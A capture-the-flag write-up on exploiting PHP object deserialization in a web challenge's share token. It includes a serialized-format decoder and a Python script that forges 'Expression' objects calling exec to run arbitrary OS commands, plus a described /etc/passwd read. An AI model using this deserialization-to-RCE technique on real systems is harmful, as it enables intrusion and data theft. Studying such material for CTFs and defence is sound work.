In this challenge, we were given a URL “” and were asked to find the flag on that site.

When I opened that website in Firefox, this page welcomed me.


I tried some XSS and SQL injection payloads, but I thought I was going down a rabbit hole. After some time my teammates suggested trying to divide 1 by 0. So I did that (:

Division by zero error

After that error, I started playing with the token. It was base64-encoded data that looked like JSON at first:

O:10:"Expression":3:{s:14:"\0Expression\0op";s:3:"div";s:18:"\0Expression\0params";a:2:{i:0;d:1;i:1;d:0;}s:9:"stringify";s:5:"1 / 0";}

(The \0 bytes are not visible when the decoded token is printed, but the lengths s:14 and s:18 only add up with them: PHP serializes a private property as "\0ClassName\0property".)

I realized that this question was about PHP serialization. I did some searching on Google and read an article on the topic[1]. Then I tried to execute a command by just changing some parts of that serialized object.

Expressionop: holds the name of a function; the server calls whatever function is named here.
Expressionparams: the parameters that are passed to that function.
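To see exactly what the server receives, here is a small decoder for PHP's serialize() format. It is an added example written for this writeup, not code from the original post or from the challenge. The sample token is constructed from the object shown above, with the null bytes restored around the private property names (an assumption based on the s:14 / s:18 lengths); the decoder reports each property's visibility so that "op" and "params" show up as private members of Expression.

```python
import base64

# Constructed sample: the challenge token re-serialized with the null bytes
# that PHP puts around private property names ("\0Class\0prop"). The s:14 and
# s:18 lengths only add up once those bytes are counted.
SAMPLE = (b'O:10:"Expression":3:{'
          b's:14:"\x00Expression\x00op";s:3:"div";'
          b's:18:"\x00Expression\x00params";a:2:{i:0;d:1;i:1;d:0;}'
          b's:9:"stringify";s:5:"1 / 0";}')
SAMPLE_TOKEN = base64.b64encode(SAMPLE)


def describe_property(raw: str) -> str:
    """Translate PHP's mangled property names into visibility + name."""
    if raw.startswith('\x00*\x00'):            # "\0*\0name"       -> protected
        return 'protected ' + raw[3:]
    if raw.startswith('\x00'):                 # "\0Class\0name"   -> private
        cls, _, name = raw[1:].partition('\x00')
        return 'private %s::%s' % (cls, name)
    return 'public ' + raw                     # plain name        -> public


class PhpUnserializer:
    """Minimal parser for PHP's serialize() format: N, b, i, d, s, a, O."""

    def __init__(self, data: bytes):
        self.data = data
        self.pos = 0

    def parse(self):
        value = self._value()
        if self.pos != len(self.data):
            raise ValueError('trailing data at offset %d' % self.pos)
        return value

    def _read_until(self, sep: bytes) -> bytes:
        end = self.data.index(sep, self.pos)
        out = self.data[self.pos:end]
        self.pos = end + len(sep)
        return out

    def _expect(self, token: bytes):
        if not self.data.startswith(token, self.pos):
            raise ValueError('expected %r at offset %d' % (token, self.pos))
        self.pos += len(token)

    def _string(self) -> bytes:
        # s:<byte length>:"<raw bytes>"  -- length-prefixed, so the content
        # may freely contain quotes, semicolons or null bytes.
        length = int(self._read_until(b':'))
        self._expect(b'"')
        s = self.data[self.pos:self.pos + length]
        self.pos += length
        self._expect(b'"')
        return s

    def _value(self):
        tag = self.data[self.pos:self.pos + 1]
        self.pos += 1
        if tag == b'N':
            self._expect(b';')
            return None
        self._expect(b':')
        if tag == b'b':
            return self._read_until(b';') == b'1'
        if tag == b'i':
            return int(self._read_until(b';'))
        if tag == b'd':
            return float(self._read_until(b';'))
        if tag == b's':
            s = self._string()
            self._expect(b';')
            return s.decode('latin-1')
        if tag == b'a':
            count = int(self._read_until(b':'))
            self._expect(b'{')
            arr = {}
            for _ in range(count):
                key = self._value()
                arr[key] = self._value()
            self._expect(b'}')
            return arr
        if tag == b'O':
            name = self._string().decode('latin-1')
            self._expect(b':')
            count = int(self._read_until(b':'))
            self._expect(b'{')
            props = {'__class__': name}
            for _ in range(count):
                raw = self._value()          # property name, serialized as a string
                props[describe_property(raw)] = self._value()
            self._expect(b'}')
            return props
        raise ValueError('unsupported tag %r at offset %d' % (tag, self.pos - 1))


def decode_token(token: bytes) -> dict:
    """Base64-decode a share token and unserialize the PHP object inside."""
    return PhpUnserializer(base64.b64decode(token)).parse()


if __name__ == '__main__':
    for key, value in decode_token(SAMPLE_TOKEN).items():
        print('%-30s %r' % (key, value))
```

Running it prints the class name, then "private Expression::op" with 'div', "private Expression::params" with {0: 1.0, 1: 0.0} and "public stringify" with '1 / 0'. The decoder is deliberately strict (it fails on trailing bytes or unexpected tags), which is also handy for checking a hand-built payload before base64-encoding it: a wrong s:<length> prefix shows up as a parse error here instead of a silent failure on the server.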

After I understood the above, I crafted the payload below to test whether the deserialization could really be abused. If it works, the server should return the contents of its /etc/passwd file, because I used the PHP function file_get_contents and passed the filename /etc/passwd as its argument.


Then I base64-encoded that data and sent it back to the server through its "Share it" link. Our test URL was . When I opened it in Firefox, I saw that it was working.

Testing RCE

To find the flag quickly, I needed to get rid of these four manual steps: change something in the serialized object -> encode it -> send it -> analyze the result. So I wrote a small Python shell to automate them. This time I used the PHP function exec, whose argument is expected to be an OS command. (btw pls don't judge me for this script)

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# License           : MIT
# Author            : Mustafa ÇALAP
# Date              : 23.11.2018
# Last Modified Date: 23.11.2018

from base64 import b64encode, b64decode
import requests
import re

# Base URL of the "Share it" link; the base64 token is appended to it.
url = ''

# PHP function that the deserialized Expression object will call.
php_func = 'exec'


def build_payload(func, param):
    """Serialize an Expression object with attacker-chosen op and params.

    op and params are private properties, so PHP serializes their names as
    "\\0Expression\\0op" and "\\0Expression\\0params"; the null bytes count
    toward the s:14 / s:18 lengths. All string lengths are byte lengths.
    """
    func = func.encode()
    param = param.encode()
    return (b'O:10:"Expression":3:{'
            b's:14:"\x00Expression\x00op";s:%d:"%s";'
            b's:18:"\x00Expression\x00params";s:%d:"%s";'
            b's:9:"stringify";s:4:"TEST";}' % (len(func), func, len(param), param))


session = requests.Session()

while True:
    func_param = input('Command: ')
    if func_param == "":
        func_param = 'ls -la'
    # The command output is base64-encoded on the server and decoded here,
    # so special characters survive the trip through the HTML <pre> block.
    func_param = func_param + ' | base64'

    token = b64encode(build_payload(php_func, func_param))
    final = url + token.decode()

    req = session.get(final)
    res = re.findall('<pre>(.*)</pre>', req.text, flags=re.DOTALL)

    print('=' * 20 + 'URL' + '=' * 20)
    print(final)
    print('=' * 20 + 'RESULT' + '=' * 20)
    if res:
        print(b64decode(res[0]).decode(errors='replace'))
    else:
        print(req.text)

I listed the root directory of the server and saw the file fl4g_h4r3, then read it and got the points.

Getting the Flag

I believe this was the easiest challenge, because it was the only one I managed to solve (: